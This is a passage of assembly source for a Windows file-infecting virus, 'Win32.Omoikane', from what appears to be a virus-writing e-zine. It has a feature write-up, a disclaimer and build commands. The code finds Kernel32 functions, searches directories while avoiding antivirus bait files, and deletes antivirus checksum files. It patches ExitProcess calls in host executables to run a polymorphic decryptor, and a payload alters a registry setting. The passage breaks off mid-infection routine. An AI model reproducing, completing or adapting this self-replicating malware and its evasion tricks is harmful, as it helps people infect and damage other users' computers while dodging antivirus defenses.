COMMENT ` ---------------------------------------------------------------- )=- -=( Natural Selection Issue #1 ---------------------------- Win32.Omoikane )=- -=( ---------------------------------------------------------------------- )=- -=( 0 : Win32.Omoikane Features ------------------------------------------ )=- Imports: GetModuleHandleA and ExitProcess from host, rest are direct from Kernel32 Infects: PE files containing GetModuleHandleA. Expands last code section, write decryptor to code section. ExitProcess of host patched to run decryptor, which decrypts the virus into a large enough data section. Write bit not set on the code section. Strategy: Does a traversal starting at the root dir on the current drive picking random sub-directories, stopping when either there are no more directories, or some new files were infected. Compatibility: All tested windows versions, doesn't infect SFCs Saves Stamps: Yes MultiThreaded: No Polymorphism: A small slow-polymorphic decryptor in the empty space at end of the code segment which uses a series of randomly generated encryption instructions, and a couple algorithms. AntiAV / EPO: Runs on ExitProcess. Anti-bait: Does not infect goat files (small, incorrect make-up, weird filenames, etc) or anything in goat directories (too many exes, same sizes, etc). SEH Abilities: None Payload: 1/8 times, writes baka.wav into the windows directory and sets the registry to use it as the new Critical Error sound (heard when an application crashes). -=( 1 : Win32.Omoikane Design Goals -------------------------------------- )=- : Infect PE files without adding a second code section : NOT setting the write bit on a code section : Use Good Encryption This virus was created to see if the above objectives were feasible. With the advent of the PE executable and advances in the anti-virus industry, new PE viruses are generally easy prey for AVs due to one or more of the following reasons: : Entry point outside the code section. Some compression engines do this too, but any AV which this does not red-flag is crap. : Writable Code section. Almost no clean exe has this bit set. Almost all viruses do.... hmm... I wonder if the AV noticed this? : Lousy Encryption. As written in Matrix#2, AVs can cut through bad encryption methods as if they were not there. Thus, this virus was born. This virus, hides it's body in the last section of the host file (encrypted of course). It writes a small, POLYMORPHIC decryptor into the slack space at the end of the code section. It then patches the exe by looking for all "call [ExitProcess]" or "jmp [ExitProcess]" (depending on the linker) to jump to the decryptor. Since all calls are patched, no other infection marker is needed. When the host finishes running and calls ExitProcess, it will jump to the polymorphic decryptor. The decryptor then decrypts the data in the last section of the file, and places it into a writable data section. Due to how windows "works", data sections CAN have code in them. After the virus is done decrypting, it jumps to the code in the data section and executes. When the virus executes, it goes into the root directory of the current drive and attempts to infect files. If there are no files to infect, or a bait directory is determined (using a complex set of criteria), then a random subdirectory is chosen, and the infection process is repeated. (You can use "subst" to create a new drive letter and run the file on it to test it safely.) ...And so, some 2000 lines of code later - Mission Accomplished. -=( 2 : Win32.Omoikane Design Faults ------------------------------------- )=- The biggest problem is the reliance on GetModuleHandleA being present in the host file. The other large problem is the inability to go hoping from one drive to the next. There are various other things that, time permitting, should be improved. For example adding more methods of encryption, and lots of optimization. But for now... -=( 3 : Win32.Omoikane Disclaimer ---------------------------------------- )=- THE CONTENTS OF THIS ELECTRONIC MAGAZINE AND ITS ASSOCIATED SOURCE CODE ARE COVERED UNDER THE BELOW TERMS AND CONDITIONS. IF YOU DO NOT AGREE TO BE BOUND BY THESE TERMS AND CONDITIONS, OR ARE NOT LEGALLY ENTITLED TO AGREE TO THEM, YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY. COPYRIGHT Copyright on materials in this magazine and the information therein and their arrangement is owned by FEATHERED SERPENTS unless otherwise indicated. RIGHTS AND LIMITATIONS You have the right to use, copy and distribute the material in this magazine free of charge, for all purposes allowed by your governing laws. You are expressly PROHIBITED from using the material contained herein for any purposes that would cause or would help promote the illegal use of the material. NO WARRANTY The information contained within this magazine are provided "as is". FEATHERED SERPENTS do not warranty the accuracy, adequacy, or completeness of given information, and expressly disclaims liability for errors or omissions contained therein. No implied, express, or statutory warranty, is given in conjunction with this magazine. LIMITATION OF LIABILITY In *NO* event will FEATHERED SERPENTS or any of its MEMBERS be liable for any damages including and without limitation, direct or indirect, special, incidental, or consequential damages, losses, or expenses arising in connection with this magazine, or the use thereof. ADDITIONAL DISCLAIMER Computer viruses will spread of their own accord between computer systems, and across international boundaries. They are raw animals with no concern for the law, and for that reason your possession of them makes YOU responsible for the actions they carry out. The viruses provided in this magazine are for educational purposes ONLY. They are NOT intended for use in ANY WAY outside of strict, controlled laboratory conditions. If compiled and executed these viruses WILL land you in court(s). You will be held responsible for your actions. As source code these viruses are inert and covered by implied freedom of speech laws in some countries. In binary form these viruses are malicious weapons. FEATHERED SERPENTS do not condone the application of these viruses and will NOT be held LIABLE for any MISUSE. -=( 4 : Win32.Omoikane Compile Instructions ------------------------------ )=- TASM32 5.0 & TLINK32 tasm32 /m /ml Omoikane.asm tlink32 /Tpe /x Omoikane.obj, Omoikane.exe,,import32.lib pewrsec Omoikane.exe -=( 5 : Win32.Omoikane --------------------------------------------------- ) ` %out Assembling file implies acceptance of disclaimer inside source code DEBUG equ 0 ; Toggle Slow/Fast Poly, etc DEBUGENTRY equ 0 ; decryptor starts with an 'int 3' DEBUGROOTDIR equ 0 ; 0= root dir, 1= 'goats' subdir if DEBUG MINCODESIZE equ 100h ; Min Raw size of host's CS MINHOSTSIZE equ 100h else MINCODESIZE equ 1000h MINHOSTSIZE equ 10000h ; bad exe if < 10000h bytes endif MINSLACKSPACE equ 50 ; Need at least 50 bytes at end of CS MAXEXEPERDIR equ 30 ; over 25 exes and skip dir MAXBADEXE equ 7 ; 7 bad exes before skipping dir MAXSAMESIZE equ 3 ; 3 same size files = goat dir MAXSIZEPATTERN equ 3 ; 3 exes in same size increments. .386 .model flat, stdcall ; ************************************************************************ ; Declarations ; ************************************************************************ GetModuleHandleA PROCDESC WINAPI :DWORD OPEN_EXISTING equ 3 FILE_SHARE_WRITE equ 0002h FILE_BEGIN equ 0 FILE_MAP_WRITE equ 2 FILE_ATTRIBUTE_NORMAL equ 00000080h INVALID_HANDLE_VALUE equ 0FFFFFFFFh GENERIC_READ equ 80000000h GENERIC_WRITE equ 40000000h MAX_PATH equ 260 CREATE_ALWAYS equ 2 PAGE_READWRITE equ 00000004h HKEY_USERS equ 80000003h REG_SZ equ 1 FILE_ATTRIBUTE_DIRECTORY equ 00000010h WIN32_FIND_DATA struct fd_dwFileAttributes dd 0 fd_ftCreationTime dd 0, 0 fd_ftLastAccessTime dd 0, 0 fd_ftLastWriteTime dd 0, 0 fd_nFileSizeHigh dd 0 fd_nFileSizeLow dd 0 fd_dwReserved0 dd 0 fd_dwReserved1 dd 0 fd_cFileName db 260 dup(0) fd_cAlternateFileName db 14 dup(0) WIN32_FIND_DATA ends FILETIME struct ft_dwLowDateTime dd 0 ft_dwHighDateTime dd 0 FILETIME ends ; -****************- ; PE Header format ; -****************- PEHEADER struct ID dd ? Machine dw ? NumberOfSections dw ? TimeDateStamp dd ? PointerToSymbolTable dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? Characteristics dw ? ; Optional Header: MagicNumber dw ? MajorLinkerVersion db ? MinorLinkerVersion db ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUninitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ImageBase dd ? SectionAlignment dd ? FileAlignment dd ? MajorOperatingSystemVersion dw ? MinorOperatingSystemVersion dw ? MajorImageVersion dw ? MinorImageVersion dw ? MajorSubsystemVersion dw ? MinorSubsystemVersion dw ? Reserved1 dd ? SizeOfImage dd ? SizeOfHeaders dd ? CheckSum dd ? Subsystem dw ? DllCharacteristics dw ? SizeOfStackReserve dd ? SizeOfStackCommit dd ? SizeOfHeapReserve dd ? SizeOfHeapCommit dd ? LoaderFlags dd ? NumberOfRvaAndSizes dd ? DataDirectory dd 20 dup (?) PEHEADER ends ; Data Directory ; -------------- DIR_EXPORT_TABLE equ 0 DIR_IMPORT_TABLE equ 1 DIR_RESOURCE_TABLE equ 2 DIR_EXCEPTION_TABLE equ 3 DIR_SECURITY_TABLE equ 4 DIR_FIXUP_TABLE equ 5 DIR_DEBUG_TABLE equ 6 DIR_IMAGE_DESCRIPTION equ 7 DIR_MACHINE_SPECIFIC_DATA equ 8 DIR_THREAD_LOCAL_STORAGE equ 9 DIR_LOAD_CONFIG equ 10 DIR_BOUND_IMPORT equ 11 DIR_IMPORT_ADDRESS_TABLE equ 12 ; -*******************- ; Export Table format ; -*******************- EXPORTHEADER struct UnusedCharacteristics dd ? DateTimeStamp dd ? MajorVersion dw ? MinorVersion dw ? Name dd ? Base dd ? NumberOfFunctions dd ? NumberOfNames dd ? AddressOfFunctions dd ? AddressOfNames dd ? AddressOfNameOrdinals dd ? EXPORTHEADER ends ; -**************************- ; Section Table Entry format ; -**************************- SECTION struct sec_Name db 8 dup (?) sec_VirtualSize dd ? sec_VirtualAddress dd ? sec_SizeOfRawData dd ? sec_PointerToRawData dd ? sec_PointerToRelocations dd ? sec_PointerToLinenumbers dd ? sec_NumberOfRelocations dw ? sec_NumberOfLineNumbers dw ? sec_Characteristics dd ? SECTION ends ; Section Characteristics flags ; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC_CODE equ 00000020h SEC_INITIALIZED_DATA equ 00000040h SEC_UNINITIALIZED_DATA equ 00000080h SEC_NO_CACHE equ 04000000h SEC_NOT_PAGEABLE equ 08000000h SEC_SHARED equ 10000000h SEC_EXECUTABLE equ 20000000h SEC_READ equ 40000000h SEC_WRITE equ 80000000h ; -*******************- ; Import Table format ; -*******************- IMPORTTABLE struct imp_Characteristics dd ? imp_DateTimeStamp dd ? imp_ForwarderChain dd ? imp_Name dd ? imp_FirstThunk dd ? IMPORTTABLE ends ; ************************************************************************ ; Data Segment (empty) ; ************************************************************************ .data dummy db 0 ; ************************************************************************ ; ; Code Segment ; ; ************************************************************************ .code VIRUSTOTALSIZE equ offset VirusEnd - offset VirusStart VIRUSCODESIZE equ offset VirusInitEnd - offset VirusStart filesize equ 7045 BakaFileSize equ 8 HOST: xor ebp, ebp call GetModuleHandleA, offset nKernel32 jmp short SkipInFirstGeneration VirusStart: call Get_Delta Get_Delta: pop ebp sub ebp, offset Get_Delta lea eax, nKernel32+ebp push eax dw 15FFh ; Call [var containing offset GetModuleHandle] GetModHandleAddy dd 0 SkipInFirstGeneration: ;-*********************************- ; Get other function addresses from ; the export table of Kernel32.dll ;-*********************************- GetFunctions: mov ebx, dword ptr [eax+3Ch] ; RVA of PE Header mov ebx, dword ptr [ebx+eax].DataDirectory[0] mov ecx, dword ptr [ebx+eax].NumberOfNames ; Number of Names mov NumOfNames+ebp, ecx xor ecx, ecx ; Currently at Name 1 mov edi, dword ptr [ebx+eax].AddressOfNames ; Address of Names mov edx, dword ptr [ebx+eax].AddressOfFunctions ; RVAs of functions add edx, eax mov ebx, dword ptr [ebx+eax].AddressOfNameOrdinals ; Ordinals add ebx, eax FindAddress: mov esi, dword ptr [edi+eax] add esi, eax push edi lea edi, nGetProcAddr+ebp push ecx mov ecx, 15 repz cmpsb pop ecx pop edi jz short Match add edi, 4 inc ecx cmp ecx, NumOfNames+ebp jnge FindAddress OhShitFailImport: dw 15FFh ; Call [var containing offset ExitProcess] EmergencyExitAddy dd 0 ; (exit value should be on stack from host) Match: movzx ecx, word ptr [ebx+2*ecx] mov ecx, dword ptr [edx+4*ecx] add ecx, eax mov ebx, eax mov _GetProcAddress+ebp, ecx ; GetProcAddress is now in ecx.... ; Now import the rest of the needed functions lea esi, InfFunctions+ebp lea edi, InfDest+ebp InfGetFuncLoop: lodsb movzx ecx, al jecxz InfImpDone push esi add esi, ecx call _GetProcAddress+ebp, ebx or eax,eax jz OhShitFailImport stosd jmp InfGetFuncLoop InfImpDone: call LoadSFC ; Load SFC Library if exists db 'sfc.dll',0 LoadSFC: call _LoadLibraryA+ebp mov SFCLib+ebp, eax or eax,eax jz short NoSFCdll ; Probably 95 or 98 call PushSFCfunc db 'SfcIsFileProtected',0 PushSFCfunc: call _GetProcAddress+ebp, eax NoSFCdll: mov _SfcIsFileProtected+ebp, eax lea eax, DirBuf+ebp call _GetCurrentDirectoryA+ebp, 256, eax lea eax, RootDir+ebp call _SetCurrentDirectoryA+ebp, eax lea eax, CurrentTime+ebp call _GetSystemTimeAsFileTime+ebp, eax ror CurrentTime.ft_dwLowDateTime+ebp, 5 ; Get rid of ending 0s ;>>>>>----------------------------------------------------------------<<<<< ; ****** Payload start here ****** ; (makes baka.wav play when a program crashes) test CurrentTime.ft_dwLowDateTime+ebp, 7 ; 1 in 8 times jnz SearchNewDir lea edi, buffer+ebp call _GetWindowsDirectoryA+ebp, edi, MAX_PATH push edi add edi, eax lea esi, bakafile+ebp push 10 pop ecx rep movsb pop edi mov esi, ecx call _CreateFileA+ebp, edi, GENERIC_READ+GENERIC_WRITE, esi, esi, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, esi or eax, eax js ExitPayload push eax ; Push FileHandle call _CreateFileMappingA+ebp, eax, esi, PAGE_READWRITE, esi, filesize, esi or eax, eax je CloseAndExitPayload call _MapViewOfFile+ebp, eax, FILE_MAP_WRITE, esi, esi, esi push eax ; Push Memory Addy xchg eax, edi lea esi, BakaWav+ebp mov edx, filesize push ebp call decode pop ebp call PushRegLibName ; Load the Reg* functions db 'ADVAPI32',0 PushRegLibName: call _LoadLibraryA+ebp push eax xchg eax, ebx lea esi, RegFunctions+ebp lea edi, RegFuncDest+ebp call FillImports jc short FreeLibAndExit lea eax, RegKey+ebp lea ecx, RegHnd+ebp call _RegOpenKeyA+ebp, HKEY_USERS, eax, ecx mov ebx, RegHnd+ebp push ebx lea eax, RegKey+ebp lea ecx, bakafile+1+ebp call _RegSetValueA+ebp, HKEY_USERS, eax, REG_SZ, ecx, BakaFileSize CloseKeyAndExit: call _RegCloseKey+ebp FreeLibAndExit: call _FreeLibrary+ebp CloseAndExitPayload: call _UnmapViewOfFile+ebp call _CloseHandle+ebp ExitPayload: call _CloseHandle+ebp ; ****** Payload end here ****** SearchNewDir: lea ecx, FileMaskAny+ebp lea edx, FindFile+ebp call _FindFirstFileA+ebp, ecx, edx mov SearchHnd+ebp, eax cmp eax, INVALID_HANDLE_VALUE je ExitProgram xor eax, eax mov NumInfected+ebp, al mov AVCRCFlag+ebp, al mov NonExeCount+ebp, eax mov DirCount+ebp, eax mov ExeGoodCount+ebp, eax mov ExeBadCount+ebp, eax mov ExeSizesPtr+ebp, eax ScanDirLoop: call GetShortFileName test FindFile.fd_dwFileAttributes+ebp, FILE_ATTRIBUTE_DIRECTORY jnz ScanDirStats ; ************************ ; Check if File is an .EXE ; ************************ mov edi, esi mov al, 0 mov ecx, 255 ; (13 should be enough, but if long...) repnz scasb cmp dword ptr [edi-5], 'EXE.' jne IncNonExeCount ; ***************************** ; Check if File is not known AV ; ***************************** lea edi, AVNames+ebp ; Check if AV - load names CheckVsAV: movzx ecx, byte ptr [edi] ; Load length of name inc edi ; skip past length byte or ecx,ecx ; Is length zero? jz short NotAVName ; Yes - passed AV check push esi ; Save Filename repz cmpsb ; Compare pop esi ; Restore FileName jz AbortDir ; Oh oh - match (skip dir) add edi, ecx ; Goto next AV Name jmp CheckVsAV NotAVName: ; ******************* ; Possible Goat File? ; ******************* call ExeTest jc IncExeBadCount inc ExeGoodCount+ebp mov ecx, ExeSizesPtr+ebp ; Store file sizes for analyses cmp ecx, MAXEXEPERDIR je short GetNextScanFile mov eax, FindFile.fd_nFileSizeLow+ebp mov [offset ExeSizes + 4*ecx + ebp], eax inc ExeSizesPtr+ebp GetNextScanFile: lea ecx, FindFile+ebp call _FindNextFileA+ebp, SearchHnd+ebp, ecx or eax, eax jnz ScanDirLoop call _FindClose+ebp, SearchHnd+ebp ; Check if probable goat directory mov eax, ExeGoodCount+ebp mov ebx, ExeBadCount+ebp mov ecx, NonExeCount+ebp cmp eax, 0 je GotoNextDir cmp ebx, MAXBADEXE ; Too many possible goats? ja GotoNextDir cmp eax, ebx ; More bad EXEs than goods? jb GotoNextDir add ebx, eax ; Too Many EXEs? cmp ebx, MAXEXEPERDIR ja GotoNextDir cmp ebx, ecx ; Too high a ratio of EXEs? ja GotoNextDir cmp eax, MAXSAMESIZE jbe short FindExes mov ecx, ExeSizesPtr+ebp ; Bubble Sort Exe Sizes dec ecx lea edi, ExeSizes+ebp xor ebx, ebx BubbleLoop1: lea edx, [ebx+1] BubbleLoop2: mov eax, [edi + 4*ebx] cmp eax, [edi + 4*edx] jbe short BubbleNoSwap xchg [edi + 4*edx], eax mov [edi + 4*ebx], eax BubbleNoSwap: inc edx cmp edx, ecx jbe BubbleLoop2 inc ebx cmp ebx, ecx jb BubbleLoop1 xor ebx, ebx ; Num of same increments xor edx, edx ; Num of files with same size as another xor esi, esi ; Size of last increment (init to -1) dec esi ExeSizeLoop: mov eax, [edi+4*ecx] sub eax, [edi+4*ecx-4] jnz short ExesNotSameSize inc edx cmp edx, MAXSAMESIZE-1 jae GotoNextDir jmp short NoSizePattern ExesNotSameSize: xor edx, edx xchg eax, esi cmp eax, esi jne short NoSizePattern inc ebx NoSizePattern: loop ExeSizeLoop cmp ebx, MAXSIZEPATTERN jae GotoNextDir FindExes: lea ecx, FileMaskExe+ebp lea edx, FindFile+ebp call _FindFirstFileA+ebp, ecx, edx mov SearchHnd+ebp, eax FindExeLoop: call GetShortFileName call ExeTest jc short FindNextExe lea eax, FindFile.fd_cFileName+ebp call _SetFileAttributesA+ebp, eax, FILE_ATTRIBUTE_NORMAL or eax, eax ; Set Attributes OK? je short FindNextExe ; No- oh oh. Network? push CurrentTime.ft_dwHighDateTime+ebp ; Save seed (rand slow) shr CurrentTime.ft_dwHighDateTime+ebp, 12 ; Divide by 40 days call InfectTheFileAlready ; About time, huh? pop CurrentTime.ft_dwHighDateTime+ebp ; restore seed lea eax, FindFile.fd_cFileName+ebp call _SetFileAttributesA+ebp, eax, FindFile.fd_dwFileAttributes+ebp FindNextExe: lea ecx, FindFile+ebp call _FindNextFileA+ebp, SearchHnd+ebp, ecx or eax, eax jnz FindExeLoop AbortDir: call _FindClose+ebp, SearchHnd+ebp cmp NumInfected+ebp, 0 ; Exit if done infection jne RemoveCRCsAndExit GotoNextDir: mov ecx, DirCount+ebp ; Exit if no more dirs or ecx, ecx jz ExitProgram call randomfast xor edx, edx div ecx inc edx mov DirCount+ebp, edx lea ecx, FileMaskAny+ebp lea edx, FindFile+ebp call _FindFirstFileA+ebp, ecx, edx xchg eax, ebx ChangeDirLoop: test FindFile.fd_dwFileAttributes+ebp, FILE_ATTRIBUTE_DIRECTORY jz short FindDir cmp byte ptr FindFile.fd_cFileName+ebp, '.' je short FindDir dec DirCount+ebp jz short ChangeToDir FindDir: lea ecx, FindFile+ebp call _FindNextFileA+ebp, ebx, ecx jmp short ChangeDirLoop ChangeToDir: call _FindClose+ebp, ebx lea ecx, FindFile.fd_cFileName+ebp call _SetCurrentDirectoryA+ebp, ecx jmp SearchNewDir IncExeBadCount: inc ExeBadCount+ebp jmp GetNextScanFile ScanDirStats: cmp byte ptr [esi], '.' je GetNextScanFile inc DirCount+ebp jmp GetNextScanFile IncNonExeCount: lea edi, CRCNames+ebp xor edx, edx inc edx CRCNameLoop: movzx ecx, byte ptr [edi] inc edi or ecx, ecx jz short CRCNamePass push esi repz cmpsb pop esi jz short CRCNameFail add edi, ecx shl edx, 1 jmp CRCNameLoop CRCNameFail: or AVCRCFlag+ebp, dl jmp short ExitIncNonExeCount CRCNamePass: inc NonExeCount+ebp ExitIncNonExeCount: jmp GetNextScanFile ; Remove any AV CRCs.... RemoveCRCsAndExit: lea edi, CRCNames+ebp xor esi, esi inc esi RemoveAVCRCs: movzx ebx, byte ptr [edi] or ebx, ebx jz short ExitProgram inc edi test dword ptr AVCRCFlag+ebp, esi jnz short DeleteAVCRC NextCRCRemove: shl esi, 1 add edi, ebx jmp RemoveAVCRCs DeleteAVCRC: call _SetFileAttributesA+ebp, edi, FILE_ATTRIBUTE_NORMAL call _DeleteFileA+ebp, edi jmp NextCRCRemove ExitProgram: mov ecx, SFCLib+ebp ; Free SFC lib if loaded jecxz NoSFCFreeLib call _FreeLibrary+ebp, ecx NoSFCFreeLib: lea eax, DirBuf+ebp call _SetCurrentDirectoryA+ebp, eax call _ExitProcess+ebp, 0 ; ******************************** ; esi=short filename from FindFile ; ******************************** GetShortFileName: lea esi, FindFile.fd_cAlternateFileName+ebp cmp byte ptr [esi], 0 ; Sometimes unused - check jne short GotShortFileName lea esi, FindFile.fd_cFileName+ebp ; put filename in ds:esi GotShortFileName: ret ; ****************************** ; ; TEST EXE FILE FOR GOAT ; ; ****************************** ExeTest: ; ****************************** ; Check if File is not too small ; ****************************** CheckFileSize: cmp dword ptr FindFile.fd_nFileSizeLow+ebp, MINHOSTSIZE jb short ExeTestBad ; File too small? ; **************************** ; Check if File is not too new ; **************************** CheckFileTime: mov eax, CurrentTime.ft_dwHighDateTime+ebp sub eax, 1000h cmp eax, FindFile.fd_ftLastWriteTime.ft_dwHighDateTime+ebp jb short ExeTestBad ; ******************************** ; Check if File contains long runs ; of letters or contains numbers. ; ******************************** mov edi, esi mov byte ptr LetterCount+ebp, 0 ; Currently run of 0 same chars mov byte ptr LastLetter+ebp, 0 ; Reset last letter lea esi, FindFile.fd_cFileName+ebp ; put long filename in ds:esi letterloop: lodsb ; load letter or al,al ; End of filename? Yes - exit. jz short DoneRunCheck cmp al, '0' ; Check if it has file has jb short NextCheck ; numbers in it. If so, skip. cmp al, '2' jb short ExeTestBad cmp al, '4' jb short NextCheck cmp al, '9' jbe short ExeTestBad NextCheck: xor bl,bl ; Zero Letter Run counter cmp LastLetter+ebp, al ; Is same as last letter? jne short DoneCheck ; Yes - it's ok. mov bl, LetterCount+ebp ; No? # of letters repeated inc bx ; increment LetterCount cmp bl, 2 ; Is this he third same letter? jae short ExeTestBad ; Yes - fail. Look elsewhere DoneCheck: mov LastLetter+ebp, al ; Save last letter mov LetterCount+ebp, bl ; Save Run count jmp short letterloop ; Get next letter DoneRunCheck: clc ret ExeTestBad: stc ret ;>>>>>----------------------------------------------------------------<<<<< ;********************** InfectTheFileAlready: lea ebx, FindFile.fd_cFileName+ebp xor edi, edi mov ecx, _SfcIsFileProtected+ebp ; Is SFC protected? jecxz NotSFCProtected call ecx, edi, ebx ; call function if present or eax, eax jnz ExitInfector NotSFCProtected: call _CreateFileA+ebp, ebx, GENERIC_READ+GENERIC_WRITE, FILE_SHARE_WRITE, edi, OPEN_EXISTING, edi, edi or eax, eax js ExitInfector push eax ; Push FileHandle call _CreateFileMappingA+ebp, eax, edi, PAGE_READWRITE, edi, edi, edi or eax, eax je CloseAndExitInfector push eax xchg eax, esi call _MapViewOfFile+ebp, esi, FILE_MAP_WRITE, edi, edi, edi push eax ; Push Memory Addy mov esi, eax cmp word ptr [eax], 'ZM' ; Is it an EXE? jne short InfectableNo cmp word ptr [eax+18h], 40h ; A windows EXE? jb short InfectableNo movzx ecx, word ptr [eax+3Ch] add eax, ecx cmp dword ptr [eax], 'EP' ; A PE Exe? jne short InfectableNo cmp word ptr [eax].Machine, 14Ch ; Is at least 386+ ? jb short InfectableNo cmp word ptr [eax].Machine, 160h ; Is not R3000, etc.? jae short InfectableNo cmp word ptr [eax].Subsystem, 2 ; Is Windows file? jb short InfectableNo ; 2=Windows cmp word ptr [eax].Subsystem, 3 ; 3=Console (win) jbe short IsInfectable InfectableNo: jmp UnmapAndClose IsInfectable: ; First locate imports: xchg eax, edi mov eax, dword ptr [edi].DataDirectory+8 ; Section Table: call RVA2Addr ImportLoop: cmp [eax].imp_Characteristics, 0 je InfectableNo ; No Kernel Import?!? xchg eax, edx mov eax, [edx].imp_Name call RVA2Addr cmp dword ptr [eax], 'NREK' jne short TryNextImport cmp dword ptr [eax+4], '23LE' je short FoundKernel TryNextImport: lea eax, [edx + size IMPORTTABLE] jmp ImportLoop FoundKernel: ; Now find "ExitProcess & GetModuleHandle" mov eax, [edx].imp_Characteristics or eax,eax jne short HNAExists mov eax, [edx].imp_FirstThunk HNAExists: call RVA2Addr mov ebx, eax mov edi, [edx].imp_FirstThunk xor edx,edx ; Import Flags= 0 - nothing yet FindImportFunction: mov eax, [ebx] or eax,eax je short DoneImports ; No more imports js short NotGetModuleHandle ; Some psycho is loading by ordinal call RVA2Addr inc eax inc eax xchg eax, edi test dl, 1 ; Found ExitProcess Already? jnz short NotExitProcess mov ecx, 12 push esi push edi lea esi, nExitProcess+ebp repz cmpsb pop edi pop esi jne short NotExitProcess or dl, 1 ; Mark as found mov ExitProcessRVA+ebp, eax ; Save RVA NotExitProcess: test dl, 2 ; Found GetMoguleHandle Already? jnz short NotGetModuleHandle mov ecx, 17 push esi push edi lea esi, nGetModuleHandle+ebp rep cmpsb pop edi pop esi jne short NotGetModuleHandle or dl, 2 mov GetModuleHandleRVA+ebp, eax NotGetModuleHandle: xchg eax, edi add ebx, 4 ; Next Function Name add edi, 4 ; Get Next Function RVA jmp FindImportFunction DoneImports: cmp dl, 3 ; Found both functions? jne InfectableNo movzx ebx, word ptr [esi+3Ch] add ebx, esi mov edi, ebx ; edi= PE Header offset movzx ecx, [ebx].NumberOfSections movzx edx, word ptr [ebx].SizeOfOptionalHeader lea edx, [ebx+edx+18h] ; Get Last Section push ecx push edx mov eax, [edx].sec_PointerToRawData mov ebx, edx LastSectionLoop: cmp eax, [edx].sec_PointerToRawData jae short NotLastSection mov eax, [edx].sec_PointerToRawData mov ebx, edx NotLastSection: add edx, size SECTION loop LastSectionLoop mov LastSectionEntryPtr+ebp, ebx pop edx pop ecx ; Get Biggest Writable Data Section push ecx push edx xor eax, eax ; Largest section found so far DataSectionLoop: test byte ptr [edx].sec_Characteristics+3, 80h ; Writable section? jz short NextDataSec cmp eax, [edx].sec_VirtualSize jae short NextDataSec mov eax, [edx].sec_VirtualSize mov ebx, edx NextDataSec: add edx, size SECTION loop DataSectionLoop pop edx pop ecx mov DataSectionEntryPtr+ebp, ebx cmp eax, VIRUSTOTALSIZE jnb short DataSectionSizePass ; *************** ; If Data Size is just a little too small, then bump it up ; *************** mov ebx, [edi].SectionAlignment dec ebx add eax, ebx not ebx and eax, ebx cmp eax, VIRUSTOTALSIZE jb InfectableNo DataSectionSizePass: mov NewVirtualSizeOfData+ebp, eax ; Find Code Section xor ebx, ebx FindCodeSection: test [edx].sec_Characteristics, SEC_CODE+SEC_EXECUTABLE jz short NotACodeSection test byte ptr [edx].sec_Characteristics+3, 80h ; Writable CS? jnz InfectableNo or ebx,ebx jnz InfectableNo mov ebx, edx NotACodeSection: add edx, size SECTION loop FindCodeSection ;* Find amount of space at the end of the of the code section. mov edx, [ebx].sec_PointerToRawData add edx, esi cmp [ebx].sec_SizeOfRawData, MINCODESIZE jb InfectableNo ; Figure out the real code size xor ecx,ecx mov FoundExitCall+ebp, ecx mov ecx, [edi].FileAlignment dec ecx test [ebx].sec_VirtualSize, ecx jz short ProbablyTLINK ; Assuming LINK - i.e. Virtual Size gives exact size of CS (not aligned). mov eax, [ebx].sec_VirtualSize add edx, eax push eax and eax, ecx inc ecx sub ecx, eax pop eax add eax, [ebx].sec_PointerToRawData cmp ecx, MINSLACKSPACE jb InfectableNo ; Now: ; - RVA -done (eax) ; - RawAddy -done (edx) ; - SizeOfSpace -done (ecx) mov EmptyCodeSecRVA+ebp, eax mov EmptyCodeSecAddr+ebp, edx mov EmptyCodeSecSize+ebp, ecx ; Now we search .text for either: ; - EE 15 (call [address]) ; - FF 25 (jmp [address]) mov ecx, [ebx].sec_SizeOfRawData sub ecx, 5 ; (no need to check last 5 bytes) push esi mov eax, [ebx].sec_PointerToRawData add eax, esi xchg eax, esi xor edx, edx ; Loop counter LinkFindJump: cmp word ptr [esi+edx], 15FFh jne short LinkJumpNotFound mov eax, dword ptr [esi+edx+2] sub eax, [edi].ImageBase cmp eax, ExitProcessRVA+ebp jne short LinkJumpNotFound mov eax, EmptyCodeSecRVA+ebp sub eax, edx sub eax, [ebx].sec_VirtualAddress sub eax, 5 mov byte ptr [esi+edx], 0E9h ; Write in jump to our code ;-) mov dword ptr [esi+edx+1], eax inc FoundExitCall+ebp LinkJumpNotFound: inc edx cmp edx, ecx jb LinkFindJump pop esi jmp HaveCSInfo ProbablyTLINK: add edx, [ebx].sec_SizeOfRawData inc ecx ScanSpaceBackWard: dec edx cmp byte ptr [edx], 0 jne short FoundActualCode loop ScanSpaceBackWard jmp InfectableNo ; Probably Some Packer FoundActualCode: add edx, 5 ; edx= Raw Adrress of free space add ecx, 4 sub ecx, [edi].FileAlignment neg ecx ; ecx= size of free space mov eax, [ebx].sec_VirtualAddress add eax, [ebx].sec_SizeOfRawData sub eax, ecx cmp ecx, MINSLACKSPACE jb InfectableNo ; Now: ; - RVA -done (eax) ; - RawAddy -done (edx) ; - SizeOfSpace -done (ecx) mov EmptyCodeSecRVA+ebp, eax mov EmptyCodeSecAddr+ebp, edx mov EmptyCodeSecSize+ebp, ecx ; Now we search .text for either: ; - EE 15 (call [address]) ; - FF 25 (jmp [address]) mov ecx, [ebx].sec_SizeOfRawData sub ecx, 5 ; (no need to check last 5 bytes) push esi mov eax, [ebx].sec_PointerToRawData add eax, esi xchg eax, esi xor edx, edx ; Loop counter TLinkFindJump: cmp word ptr [esi+edx], 25FFh jne short TLinkJumpNotFound mov eax, dword ptr [esi+edx+2] sub eax, [edi].ImageBase cmp eax, ExitProcessRVA+ebp jne short TLinkJumpNotFound mov eax, EmptyCodeSecRVA+ebp sub eax, edx sub eax, [ebx].sec_VirtualAddress sub eax, 5 mov byte ptr [esi+edx], 0E9h ; Write in jump to our code ;-) mov dword ptr [esi+edx+1], eax inc FoundExitCall+ebp TLinkJumpNotFound: inc edx cmp edx, ecx jb TLinkFindJump pop esi HaveCSInfo: cmp FoundExitCall+ebp, 0 je InfectableNo mov eax, GetModuleHandleRVA+ebp ; Link to GetModuleHandle add eax, [edi].ImageBase mov GetModHandleAddy+ebp, eax mov eax, ExitProcessRVA+ebp ; Setup emergency escape for add eax, [edi].ImageBase ; the next generation. mov EmergencyExitAddy+ebp, eax ; (hopefully never needed) push esi push edi mov esi, edi call MakeDecryptor pop edi 